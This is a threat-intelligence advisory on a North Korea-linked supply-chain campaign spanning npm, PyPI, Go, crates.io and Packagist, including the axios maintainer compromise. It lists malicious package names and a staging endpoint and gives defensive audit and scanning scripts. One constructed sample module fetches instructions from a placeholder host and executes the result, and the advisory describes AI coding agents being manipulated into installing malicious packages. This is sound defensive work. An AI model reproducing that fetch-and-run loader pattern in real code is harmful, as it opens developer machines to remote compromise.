Published: 2026-04-09
Categories: Software Supply Chain Security, Threat Intelligence, Developer Security
Contagious Interview Expands to Five Package Ecosystems
Key Takeaways
- A North Korea-linked threat cluster (tracked by Google as UNC1069, with overlapping designations including Sapphire Sleet and BlueNoroff used by Microsoft and other vendors) has expanded its “Contagious Interview” software supply chain operation to five major open-source package ecosystems: npm, PyPI, Go Modules, crates.io (Rust), and Packagist (PHP). [1]
- Since January 2025, researchers have identified more than 1,700 malicious packages tied to this campaign across all ecosystems, with the cross-ecosystem expansion publicly disclosed on April 7, 2026. [1][2]
- On March 31, 2026, UNC1069 compromised a maintainer account for the widely used axios npm package, injecting a malicious dependency into releases with a combined download volume of approximately 100 million per week. [3][10]
- The malicious packages employ a “factory model” in which the same staged loader pattern is ported across languages with minor code adjustments, reusing shared infrastructure endpoints that expose the campaign’s single operational origin. [1]
- Malicious code is designed to avoid triggering at package installation; it is embedded inside functions matching the package’s advertised purpose, increasing the time-to-detection window and defeating many automated scanning approaches. [1]
- The Security Alliance (SEAL) blocked 164 UNC1069-attributed domains impersonating Microsoft Teams and Zoom between February 6 and April 7, 2026, indicating an active social engineering component that runs in parallel with the supply chain operation. [5]
Background
North Korea’s Contagious Interview operation was first documented by Palo Alto Networks’ Unit 42 in November 2023. It targets software developers through fake technical recruiting campaigns — threat actors pose as hiring professionals at cryptocurrency firms or AI-oriented companies, approach targets via LinkedIn, Telegram, and Slack, and direct them to clone and execute a malicious code repository as part of a fabricated coding assessment. [6] The operation was initially confined almost entirely to npm, where the threat cluster published hundreds of packages impersonating legitimate developer tooling such as express, dotenv, body-parser, and nodemailer. [6]
Attribution for this cluster has evolved as tracking groups converge on overlapping behavioral evidence. Google’s Threat Intelligence Group tracks the actor as UNC1069, a financially motivated, state-nexus threat actor active since at least 2018 that has historically targeted cryptocurrency exchanges and financial institutions. [4] Microsoft tracks overlapping activity as Sapphire Sleet, and other vendors have used the designations BlueNoroff, Stardust Chollima, and TA444 for closely related subgroups within the North Korean Lazarus umbrella. [8][12] Across these designations, the operational focus is consistent: developer-environment compromise, credential and session-token theft from browsers and password managers, and cryptocurrency wallet exfiltration.
By early 2025, researchers tracking the campaign noted increasing sophistication and volume. Socket, which maintains a dedicated Contagious Interview campaign tracker, observed 35 malicious npm packages in a single wave during mid-2025, with over 4,000 combined downloads across that batch. [9] The April 2026 disclosure suggests a qualitative shift in campaign strategy: rather than concentrating primarily on npm, the threat actors now simultaneously maintain a presence across every major open-source distribution channel for web, systems, and backend development.
Security Analysis
Cross-Ecosystem Scale and the Factory Model
Socket’s April 7, 2026 disclosure confirmed that a single UNC1069-linked threat cluster had successfully published staged loaders to npm, PyPI, Go Modules, crates.io, and Packagist within the same operational cycle, reusing the same staging infrastructure and loader patterns across all five registries. [1] The disclosure identified twelve confirmed packages spanning the ecosystems: on npm, packages included dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, and debug-glitz; on PyPI, logutilkit, apachelicense, fluxhttp, and license-utils-kit; on Go Modules, github.com/golangorg/formstash; on crates.io, logtrace; and on Packagist, golangorg/logkit. [1][2]
All of these packages impersonated mundane developer utilities — logging libraries, HTTP helpers, license checkers — categories that enjoy broad organic adoption and infrequent security scrutiny. The shared staging endpoint apachelicense.vercel.app appeared across multiple ecosystem variants, exposing the campaign’s single operational backbone. [1] Researchers characterized this as a “factory model”: the same loader design is ported to each new registry with only the language-idiomatic syntax changed, substantially lowering the cost of expansion while maintaining operational coherence.
Each registry attracts a distinct developer population with different security tooling coverage. Rust and Go ecosystems have, at the time of this writing, seen comparatively lower third-party scanning deployment than the npm ecosystem, and PHP’s Packagist registry has received comparatively less threat-actor attention in prior state-linked campaigns. Distributing malicious packages across all five registries simultaneously maximizes the probability of at least one successful implant on any given developer’s machine and degrades the value of ecosystem-specific monitoring.
Loader Architecture and Hidden Execution
A consistent technical signature distinguishes the Contagious Interview packages from opportunistic commodity malware: malicious code does not execute at package installation. Instead, it is embedded inside functions that perform genuine, documented work — a logging function that logs, an HTTP helper that makes requests — with the malicious payload path hidden in an undocumented helper or triggered by a specific parameter. [1] The PHP package golangorg/logkit, for example, exposes a write_log() function that performs real logging; the malicious execution path sits inside the undocumented helper log_level($tag=1), which contacts the staging endpoint, retrieves a download URL from a JSON response, fetches a platform-specific archive, and executes a second-stage payload. [1]
This design reflects an adaptation to automated scanning defenses. Many dependency scanning systems flag suspicious behavior at install time (install scripts, immediate network calls, eval of downloaded code). By deferring execution until the package is called from within application code, the malicious library passes install-time analysis while silently arming the developer’s environment. The npm variants differ slightly from the other ecosystems: they fetch a base64-encoded JavaScript payload and execute it in memory rather than fetching an archive, which reduces filesystem artifacts. [1]
The second-stage payloads delivered through this infrastructure are malware with combined infostealer and remote access trojan (RAT) capabilities. The campaign has deployed a family of evolving implants across its operational history: BeaverTail (an infostealer and loader written to target JavaScript and Python developer environments), InvisibleFerret (a Python-based backdoor enabling persistent command execution and extended reconnaissance), OtterCookie (a more recent RAT variant observed in late 2025 and early 2026 campaigns), and FlexibleFerret (a macOS-targeted variant). [6][8] All of these payloads are designed to harvest credentials from web browsers, password managers, and locally stored cryptocurrency wallet keys.
The Axios Supply Chain Compromise
On March 31, 2026, between 00:21 and 03:20 UTC, UNC1069 escalated from publishing novel malicious packages to compromising a trusted, existing one. The attackers gained control of an axios npm maintainer account and injected a dependency called plain-crypto-js into two axios releases: version 1.14.1 and version 0.30.4. [3][7][13] Axios is one of the most widely used JavaScript libraries in existence, simplifying HTTP requests for both Node.js and browser environments. At the time of compromise, these two versions collectively represented approximately 100 million weekly downloads. [3][10]
The plain-crypto-js dependency functioned as an obfuscated dropper deploying a new implant, WAVESHAPER.V2, across Windows, macOS, and Linux. WAVESHAPER.V2 is a fully functional RAT: it extracts system telemetry including hostname, username, OS version, time zone, and running process lists; supports in-memory Portable Executable injection and arbitrary shell command execution; and establishes persistent command-and-control channels. [3][8] Google’s Threat Intelligence Group attributed the compromise directly to UNC1069 based on infrastructure and tooling overlaps with prior Contagious Interview activity. [4] The incident was detected and the malicious versions were removed within hours, but the exposure window during a period of active downloads left a substantial number of developer and CI/CD environments potentially seeded.
The Axios compromise is significant beyond its scale. It represents a transition from the creation of novel malicious packages — which require developers to actively choose an unknown library — to the corruption of trusted, established packages that developers and automated pipelines pull without deliberate decision-making. This attack vector, often called a maintainer account takeover, bypasses the adoption friction that limits the reach of typosquatting and brand-impersonation campaigns.
Social Engineering as a Force Multiplier
The supply chain operation does not operate in isolation. In parallel, UNC1069 runs multi-week, low-pressure social engineering campaigns targeting cryptocurrency and Web3 professionals across LinkedIn, Telegram, and Slack. [4][5] Threat actors impersonate known contacts or credible recruitment brands, or they leverage previously compromised company accounts to deliver credibility before presenting a fraudulent Zoom or Microsoft Teams meeting link. The fake meeting interfaces are browser-based, built on legitimate video-conferencing SDKs, and visually indistinguishable from authentic sessions. The initial compromise payload at the meeting stage is typically a single AppleScript file or a terminal copy-paste instruction — no executable installer is involved. [5]
Between February 6 and April 7, 2026, SEAL blocked 164 UNC1069-operated domains impersonating Microsoft Teams and Zoom, providing a concrete measure of the campaign’s social engineering infrastructure scale during that 60-day window. [5] Microsoft’s analysis of recent intrusions observed the introduction of Visual Studio Code as an attack surface: when a victim opens the cloned repository in VS Code and grants trust to the repository author, VS Code automatically executes the repository’s task configuration file, which then fetches and loads the backdoor. [8] This technique integrates naturally into normal developer workflow, making behavioral detection difficult without explicit monitoring of VS Code task execution and outbound network calls from developer workstations.
The integration of supply chain poisoning with social engineering creates a redundant compromise pathway: a developer who resists the social engineering lure may still install a malicious package through normal dependency management, while a developer who scrutinizes their dependencies may succumb to the fake interview channel. The two vectors reinforce each other operationally.
Recommendations
Immediate Actions
Organizations should audit their dependency trees for the confirmed malicious packages identified in this disclosure: on npm, dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, and debug-glitz; on PyPI, logutilkit, apachelicense, fluxhttp, and license-utils-kit; on Go Modules, github.com/golangorg/formstash; on crates.io, logtrace; and on Packagist, golangorg/logkit. Any environment that installed axios versions 1.14.1 or 0.30.4 between March 31, 2026 00:21 and 03:20 UTC should be treated as potentially compromised and subjected to forensic review, with particular attention to outbound network connections, new scheduled tasks, and credential stores accessed during that window.
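As an added illustration of the audit step above (example code written for this page, not tooling from Socket, Google or CSA), the following Python script reads the five lock-file formats and reports any hit on the package names and axios releases listed in this advisory. The indicator names and versions are taken from the text; the lock-file contents, the version numbers attached to the malicious packages and the go.sum hashes are constructed samples. The parsers are deliberately minimal (npm lockfile v2/v3 `packages` map only, no lockfile v1 `dependencies` tree) and are meant to be pointed at real lock files once the sample dictionary is swapped out.

```python
import json
import re
from typing import Callable, Dict, List, Tuple

# Indicators transcribed from the disclosure summarized above.
MALICIOUS_PACKAGES: Dict[str, set] = {
    "npm": {"dev-log-core", "logger-base", "logkitx", "pino-debugger",
            "debug-fmt", "debug-glitz"},
    "pypi": {"logutilkit", "apachelicense", "fluxhttp", "license-utils-kit"},
    "go": {"github.com/golangorg/formstash"},
    "cargo": {"logtrace"},
    "composer": {"golangorg/logkit"},
}
# Trusted package, specific compromised releases.
COMPROMISED_RELEASES = {("npm", "axios", "1.14.1"), ("npm", "axios", "0.30.4")}

Entry = Tuple[str, str]               # (package, version)
Finding = Tuple[str, str, str, str]   # (ecosystem, package, version, reason)

def parse_package_lock(text: str) -> List[Entry]:
    """npm lockfile v2/v3: keys under 'packages' are install paths."""
    entries = []
    for path, meta in json.loads(text).get("packages", {}).items():
        if path == "":                       # the root project itself
            continue
        name = path.split("node_modules/")[-1]   # keeps @scope/name intact
        entries.append((name, meta.get("version", "")))
    return entries

def parse_pipfile_lock(text: str) -> List[Entry]:
    """Pipfile.lock: 'default' and 'develop' maps, versions written as '==x.y'."""
    data, entries = json.loads(text), []
    for section in ("default", "develop"):
        for name, meta in data.get(section, {}).items():
            normalized = re.sub(r"[-_.]+", "-", name).lower()   # PEP 503 form
            entries.append((normalized, meta.get("version", "").lstrip("=")))
    return entries

def parse_go_sum(text: str) -> List[Entry]:
    """go.sum: 'module version hash', plus a second '/go.mod' line per module."""
    entries = set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            entries.add((parts[0], parts[1].removesuffix("/go.mod")))
    return sorted(entries)

_CARGO_PACKAGE = re.compile(r'\[\[package\]\]\s*name = "([^"]+)"\s*version = "([^"]+)"')

def parse_cargo_lock(text: str) -> List[Entry]:
    """Cargo.lock: [[package]] tables, name always precedes version."""
    return _CARGO_PACKAGE.findall(text)

def parse_composer_lock(text: str) -> List[Entry]:
    """composer.lock: 'packages' and 'packages-dev' lists of objects."""
    data = json.loads(text)
    return [(pkg["name"], pkg.get("version", ""))
            for section in ("packages", "packages-dev")
            for pkg in data.get(section, [])]

PARSERS: Dict[str, Callable[[str], List[Entry]]] = {
    "npm": parse_package_lock, "pypi": parse_pipfile_lock, "go": parse_go_sum,
    "cargo": parse_cargo_lock, "composer": parse_composer_lock,
}

def audit(lockfiles: Dict[str, str]) -> List[Finding]:
    """Map ecosystem -> lock-file text; return every indicator hit, deduplicated."""
    findings = set()
    for ecosystem, text in lockfiles.items():
        for name, version in PARSERS[ecosystem](text):
            if name in MALICIOUS_PACKAGES[ecosystem]:
                findings.add((ecosystem, name, version, "known malicious package"))
            if (ecosystem, name, version) in COMPROMISED_RELEASES:
                findings.add((ecosystem, name, version, "compromised release"))
    return sorted(findings)

# Constructed sample lock files; the version numbers and hashes are made up.
SAMPLE_LOCKFILES = {
    "npm": json.dumps({"lockfileVersion": 3, "packages": {
        "": {"name": "demo"},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/debug-fmt": {"version": "1.0.2"}}}),
    "pypi": json.dumps({"default": {"requests": {"version": "==2.31.0"},
                                    "fluxhttp": {"version": "==0.3.1"}},
                        "develop": {}}),
    "go": "github.com/golangorg/formstash v0.2.1 h1:constructed=\n"
          "github.com/golangorg/formstash v0.2.1/go.mod h1:constructed=\n"
          "golang.org/x/text v0.14.0 h1:constructed=\n",
    "cargo": '[[package]]\nname = "serde"\nversion = "1.0.200"\n\n'
             '[[package]]\nname = "logtrace"\nversion = "0.1.3"\n',
    "composer": json.dumps({"packages": [
        {"name": "golangorg/logkit", "version": "1.0.0"},
        {"name": "monolog/monolog", "version": "3.5.0"}], "packages-dev": []}),
}

if __name__ == "__main__":
    for hit in audit(SAMPLE_LOCKFILES):
        print("%-8s %-40s %-8s %s" % hit)
```

Run against a real checkout, the same `audit()` call takes the text of `package-lock.json`, `Pipfile.lock`, `go.sum`, `Cargo.lock` and `composer.lock`; the two reasons are kept separate because a hit on a compromised axios release means an otherwise legitimate dependency was pulled during the exposure window and calls for the forensic review described above, whereas a hit on a malicious package name means the library itself was never legitimate.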
Security teams should also cross-reference their network telemetry against the 164 UNC1069-attributed domains published by SEAL in their April 2026 advisory, checking for any DNS resolution or outbound connections to those domains from developer workstations, CI/CD systems, or build servers.
Short-Term Mitigations
The technical signature that distinguishes this campaign — deferred execution, staging endpoints, and undocumented helper functions with external network calls — represents a detection opportunity. Organizations should extend dependency scanning beyond install-time analysis to include dynamic execution analysis, or deploy software composition analysis tools capable of performing behavioral analysis on package code before it is invoked in production. Pinning dependencies to verified checksums and maintaining lock files across all five ecosystems (package-lock.json, Pipfile.lock, go.sum, Cargo.lock, composer.lock) limits exposure to version substitution attacks and should be enforced in CI/CD pipelines.
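The loader signature described in the Loader Architecture section (documented function doing real work, undocumented helper that contacts a staging endpoint, parses the reply and executes what it points to) and the recommendation above to analyze package code before it is invoked are served by the same added example: a small Python AST heuristic, written for this page rather than taken from any scanner vendor, that flags functions combining an outbound network call with a dynamic-execution call and records whether the function carries a docstring. The sample module it parses is constructed to mirror the shape of the PHP `write_log()` / `log_level()` pair described above; its endpoint is a placeholder and the sample is only parsed, never run. The call-name sets are assumptions about which APIs matter and are the tuning knob for real use.

```python
import ast
from typing import Dict, List

# Call names for each stage of the staged-loader pattern described above:
# contact a staging endpoint, parse or decode what it returns, execute the result.
NETWORK_CALLS = {"urlopen", "urlretrieve", "request", "create_connection"}
DECODE_CALLS = {"loads", "b64decode", "unhexlify"}
EXEC_CALLS = {"exec", "eval", "run", "Popen", "call", "system", "load_module"}

def _call_name(node: ast.Call) -> str:
    """Bare callee name: urlopen(...) -> 'urlopen', subprocess.run(...) -> 'run'."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""

def scan_module(source: str) -> List[Dict[str, object]]:
    """Flag every function whose body both reaches the network and executes something."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        calls = {_call_name(n) for n in ast.walk(node) if isinstance(n, ast.Call)}
        stages = [label for label, names in (("network", NETWORK_CALLS),
                                              ("decode", DECODE_CALLS),
                                              ("execute", EXEC_CALLS))
                  if calls & names]
        if "network" in stages and "execute" in stages:
            findings.append({
                "function": node.name,
                "line": node.lineno,
                # Absence of a docstring is the "undocumented helper" trait.
                "documented": ast.get_docstring(node) is not None,
                "stages": stages,
            })
    return findings

# Constructed module in the shape the text describes: a documented function that
# does real work next to an undocumented helper that fetches and runs something.
# The endpoint is a placeholder; this string is parsed by scan_module, never executed.
SAMPLE_MODULE = '''
import json
import subprocess
from urllib.request import urlopen

def write_log(tag, message):
    """Append a formatted line to the application log."""
    with open("app.log", "a") as fh:
        fh.write("[%s] %s\\n" % (tag, message))

def log_level(tag=1):
    reply = json.loads(urlopen("https://staging.example.invalid/c").read())
    subprocess.run([reply["path"]])
'''

if __name__ == "__main__":
    for finding in scan_module(SAMPLE_MODULE):
        print(finding)
```

Running this over a package's unpacked source before it is first imported is the cheap end of the behavioral analysis the recommendation asks for: it catches the deferred-execution design precisely because it does not depend on anything happening at install time. Expect it to be noisy on legitimate process-management and HTTP client libraries, which is why the output carries the stage list and the `documented` flag for triage rather than a verdict.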
Developer awareness programs should address the specific social engineering lures employed by this campaign. The fake recruiter pattern — urgent outreach via LinkedIn, Telegram, or Slack, followed by a request to clone and run a repository as part of a “technical assessment” — is well-documented across multiple threat intelligence reports and can be translated directly into developer awareness training as a concrete threat scenario rather than a generic phishing warning. Organizations should explicitly instruct developers never to run code from external repositories on their development machines without security review, regardless of the apparent legitimacy of the recruiting context.
Strategic Considerations
The Axios compromise demonstrates that the threat is not limited to obscure packages that developers choose incautiously. The most depended-upon libraries in any ecosystem are high-value targets for maintainer account takeover, and defenses against this vector — particularly mandatory multi-factor authentication for package maintainers and broad adoption of supply chain integrity standards such as Sigstore and SLSA — remain uneven across major registries. Organizations building on open-source foundations should implement controls that assume any dependency could be compromised at any point: artifact integrity verification (SLSA provenance attestation, Sigstore signatures), automated lock-file enforcement, and environment isolation for build and test pipelines that limits the damage radius of a malicious execution event.
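One of the controls listed above, automated lock-file enforcement, as an added example (code written for this page, not CSA's or any registry's tooling): a Python check intended for a CI job that fails when any manifest in the checkout has no committed lock file for its ecosystem. The directory layout built by `build_demo_tree()` is constructed for the demonstration, and the `SKIP_DIRS` set is an assumption about which vendored trees to ignore.

```python
import os
import tempfile
from typing import Dict, List

# Manifest -> lock file for the five ecosystems discussed above. Lock-honoring
# installs (npm ci, pipenv sync, go mod verify, cargo build --locked, composer
# install) only help when the lock file is actually committed, which this enforces.
LOCK_PAIRS: Dict[str, str] = {
    "package.json": "package-lock.json",
    "Pipfile": "Pipfile.lock",
    "go.mod": "go.sum",
    "Cargo.toml": "Cargo.lock",
    "composer.json": "composer.lock",
}
SKIP_DIRS = {"node_modules", "vendor", "target", ".git"}   # assumed vendored trees

def missing_lockfiles(root: str) -> List[str]:
    """Return relative paths of manifests that have no sibling lock file."""
    missing = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]   # prune in place
        present = set(filenames)
        for manifest, lock in LOCK_PAIRS.items():
            if manifest in present and lock not in present:
                missing.append(os.path.relpath(os.path.join(dirpath, manifest), root))
    return sorted(missing)

def enforce(root: str) -> int:
    """CI entry point: non-zero exit status when any manifest is unlocked."""
    missing = missing_lockfiles(root)
    for path in missing:
        print(f"unlocked manifest: {path}")
    return 1 if missing else 0

def build_demo_tree() -> str:
    """Constructed checkout: locked npm and Rust components, unlocked Go and PHP ones."""
    root = tempfile.mkdtemp()
    layout = {
        "api/package.json": "{}",
        "api/package-lock.json": "{}",
        "api/node_modules/dep/package.json": "{}",   # vendored, must be ignored
        "lib/Cargo.toml": "[package]\n",
        "lib/Cargo.lock": "",
        "worker/go.mod": "module example.invalid/worker\n",
        "php/composer.json": "{}",
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    raise SystemExit(enforce(build_demo_tree()))
```

The check is intentionally about presence, not content: verifying that the pinned versions and checksums inside each lock file match what gets installed is the job of the lock-honoring install commands named in the comment, and the audit script earlier in this section covers matching those pinned entries against known-bad indicators.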
The cross-ecosystem expansion observed in this campaign also signals that monitoring programs anchored to a single registry — most commonly npm — are insufficient. Security teams need visibility into PyPI, Go Module proxy activity, Rust crate installations, and PHP Composer activity to detect campaigns of this design. SBOM-based inventorying across all language ecosystems provides the necessary foundation for rapid impact assessment when new indicators of compromise emerge, as they will continue to do as the campaign evolves.
CSA Resource Alignment
This campaign sits at the intersection of several threat dimensions addressed in CSA’s AI Safety Initiative and broader security framework portfolio.
The CSA AI Controls Matrix (AICM), recognized as a 2026 CSO Awards winner, includes an explicit Supply Chain Transparency domain among its 18 security and governance domains. [11] The AICM’s supply chain controls address the verification of AI component provenance and the management of third-party dependencies — principles directly applicable to the developer tooling ecosystem that Contagious Interview exploits. Organizations applying AICM controls should extend the same supply chain scrutiny they apply to AI model dependencies to the general open-source package graph, since the attack surface is continuous.
CSA’s Software Transparency: Securing the Digital Supply Chain publication addresses SBOM generation, OSS risk management, and CI/CD pipeline security — all directly relevant to the mitigations this campaign demands. [14] SBOM-backed dependency inventorying, continuous verification of package integrity, and hardening of CI/CD pipeline trust boundaries are the technical underpinnings of an effective defense against staged-loader supply chain attacks.
An emerging risk amplified by this campaign relates to AI-assisted development environments, which the MAESTRO framework for agentic AI threat modeling directly addresses. [15] AI coding agents that autonomously install, execute, and test packages may interact with compromised packages at elevated speed and with less human review than traditional development workflows. Where AI coding tools invoke package managers on behalf of developers, the attack surface for Contagious Interview-style implants may expand, and the social engineering lure of a fake job interview may be unnecessary when an AI agent can be induced to install a malicious package through manipulated context. This risk vector merits proactive attention as agentic development tooling matures.
CSA’s Zero Trust guidance applies to the post-compromise scenario: developer workstations should be treated as untrusted endpoints within enterprise networks, with lateral movement constrained by least-privilege access controls and continuous verification. [16] The credential-harvesting and remote access capabilities of BeaverTail, InvisibleFerret, and WAVESHAPER.V2 are designed to exploit overprivileged developer environments as a pivot point into broader organizational infrastructure.
References
[1] Socket Security. “North Korea’s Contagious Interview Campaign Spreads Across 5 Ecosystems.” Socket.dev, April 7, 2026.
[2] The Hacker News. “N. Korean Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust.” The Hacker News, April 2026.
[3] Google Cloud Blog / Threat Intelligence Group. “North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack.” Google Cloud, 2026.
[4] Google Cloud Blog / Threat Intelligence Group. “UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering.” Google Cloud, 2026.
[5] Security Alliance (SEAL). “Advisory on DPRK (UNC1069) Fake Microsoft Teams and Zoom Calls.” SEAL Radar, April 2026.
[6] Palo Alto Networks Unit 42. “Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware.” Unit 42, October 2024.
[7] Palo Alto Networks Unit 42. “Threat Brief: Widespread Impact of the Axios Supply Chain Attack.” Unit 42, April 2026.
[8] Microsoft Security Blog. “Contagious Interview: Malware Delivered Through Fake Developer Job Interviews.” Microsoft, March 11, 2026.
[9] Socket Security. “Another Wave: North Korean Contagious Interview Campaign Drops 35 New Malicious npm Packages.” Socket.dev, 2025.
[10] Elastic Security Labs. “Inside the Axios Supply Chain Compromise — One RAT to Rule Them All.” Elastic, 2026.
[11] Cloud Security Alliance. “AI Controls Matrix.” CSA, 2025.
[12] Datadog Security Labs. “Tenacious Pungsan: A DPRK Threat Actor Linked to Contagious Interview.” Datadog, October 2024.
[13] StepSecurity. “axios Compromised on npm — Malicious Versions Drop Remote Access Trojan.” StepSecurity, 2026.
[14] Cloud Security Alliance. “Software Transparency: Securing the Digital Supply Chain.” CSA, 2022.
[15] Cloud Security Alliance. “Agentic AI Threat Modeling Framework: MAESTRO.” CSA AI Safety Initiative, February 2025.
[16] Cloud Security Alliance. “Zero Trust Guiding Principles.” CSA Zero Trust Advancement Center, 2024.